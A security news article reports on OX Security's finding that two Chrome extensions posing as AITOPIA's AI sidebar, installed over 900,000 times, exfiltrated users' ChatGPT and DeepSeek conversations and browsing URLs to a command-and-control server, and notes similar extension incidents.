Two malicious extensions made to look like a legitimate tool and installed more than 900,000 times were used by bad actors to steal users’ browsing data and their conversations with AI models like ChatGPT and DeepSeek.
The two extensions – Chat GPT for Chrome with GPT-5, Claude Sonnet & DeepSeek AI (which has more than 600,000 users and carries Google’s “Featured” badge) and AI Sidebar with Deepseek, ChatGPT, Claude and more (300,000-plus users) – exfiltrate user conversations and all Chrome tab URLs every 30 minutes and sends the data to a remote command-and-control (C2) server controlled by the threat actors, according to researchers with OX Security.
Among the information exposed in the AI conversations are proprietary source code and development queries shared with ChatGPT or DeepSeek, business strategies, competitive intelligence, and strategic planning discussions, personal identifiable information (PII) disclosed during conversations, and confidential research, legal matters, and sensitive corporate communications, OX Security researchers Moshe Siman and Tov Bustan wrote in a report this week.
Stolen browser history data includes not only the complete URLs from all Chrome tabs, but also search queries containing sensitive keywords and research topics, URL parameters that could contain session tokens, user IDs, and authentication data, and internal corporate URLs revealing organizational structure and tools.
“This data can be weaponized for corporate espionage, identity theft, targeted phishing campaigns, or sold on underground forums,” Siman and Bustan wrote. “Organizations whose employees installed these extensions may have unknowingly exposed intellectual property, customer data, and confidential business information.”
The discovery by OX Security adds to a growing list of incidents involving bad actors using seemingly legitimate malicious extensions placed in online marketplaces to expose and steal sensitive information. Koi Security, earlier this month, wrote of another malicious Chrome extension that was used by more than 6 million people that collected every user prompt and chatbot response in 10 of the most popular AI large language models (LLMs), including OpenAI’s ChatGPT, Google’s Gemini, Anthropic’s Claude, and Microsoft’s Copilot.
Also in December, Koi researchers reported on a threat group called ShadyPanda, which, for seven years, uploaded legitimate extensions onto browser marketplaces, building trust and a following before quietly deploying malicious updates.
There have been other reports this year of browser extensions in both Google Chrome and Microsoft Edge web stores that bad actors initially placed legitimate and working extensions before later weaponizing them through malicious updates.
Extensions are used to improve and customize users’ browsing experience. More people are using browsers, which can expand the attack surface of the individual and the companies they work for, according to security experts.
“Browser extensions aren’t niche tools anymore; they’re deeply embedded in how people work,” Grip Security researchers Ben Robertson and Guy Katzir wrote earlier this year. “But that convenience comes with risk, especially when security teams don’t have visibility into what’s installed, what it can access, or how it behaves after login. The attack surface has shifted. And while endpoint agents and network controls still matter, they can’t see what’s happening inside the browser. That’s where threats like token hijacking and data leakage quietly take shape.”
In the most recent case, the hackers created malicious extensions that impersonated a legitimate browser created by a company called AITOPIA. The extension puts a sidebar onto any website to give users the ability to chat with popular AI LLMs, OX Security’s Siman and Bustan wrote.
In the malicious extensions, the bad actors included the same functionality of AITOPIA’s AI sidebar extension, but then included malware that steals ChatGPT and DeepSeek conversations from the browser.
“This approach serves two purposes: It makes the malicious extensions appear functional and useful (increasing download rates), while the familiar AITOPIA interface masks the malicious activity occurring in the background,” they wrote. “The malware leverages broad ‘read all website content’ permissions to monitor user browsing activity. When a user visits ChatGPT or DeepSeek, the extension identifies active conversation pages and extracts both user prompts and AI responses in real-time.”
The stolen data is stored in a local database on the victim’s system and then is stolen in batches to the C2 server. The malware asks the user for permission to collect anonymized browser behavior. If permission is granted, the extension automatically listens for events like URLs that are visited and ChatGPT and DeepSeek chats.
The hackers developed a clever way to ensure that one or the other malicious extensions are running on the victims’ systems.
“When one of the extensions is uninstalled, it opens the other malicious extension inside a new tab, to trick users into installing the other extension instead,” Siman and Bustan wrote. “In order to hide their activities, the threat actors set up the privacy policy and uninstall redirection websites using the vibe coding tool Lovable, making it hard to traceback the creators of the websites.”
The OX Security researchers wrote that they notified Google about both malicious extensions on December 29, and that the Google team responded the next day by saying they were reviewing the issue.
Recent Articles By Author